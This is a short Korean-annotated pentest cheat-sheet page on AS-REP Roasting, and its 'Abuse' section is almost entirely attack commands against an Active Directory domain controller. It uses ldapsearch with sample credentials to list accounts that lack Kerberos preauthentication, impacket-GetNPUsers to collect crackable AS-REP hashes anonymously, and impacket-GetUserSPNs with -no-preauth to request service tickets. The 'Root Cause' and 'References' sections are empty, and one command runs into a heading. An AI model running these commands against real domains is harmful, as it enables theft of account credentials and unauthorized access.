AS Requested Service Tickets
Abuse
# ldapsearch로 AS-REP Roasting 취약한 객체 열거 (도메인 계정 필요)
ldapsearch -x -H ldap://192.168.1.11 -D '[email protected]' -w 'Password123!' -b "dc=contoso,dc=com" "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" cn distinguishedName sAMAccountName
# GetNPUsers로 AS-REP Roasting 공격 (익명)
impacket-GetNPUsers contoso.com/'' -usersfile users.txt -dc-ip 192.168.1.11
# AS-REP Roasting에 취약한 객체를 이용하여 사용자 SPN 요청
impacket-GetUserSPNs -no-preauth user-A -usersfile users.txt -dc-host 192.168.1.11 contoso.com/Root Cause





References
Last updated
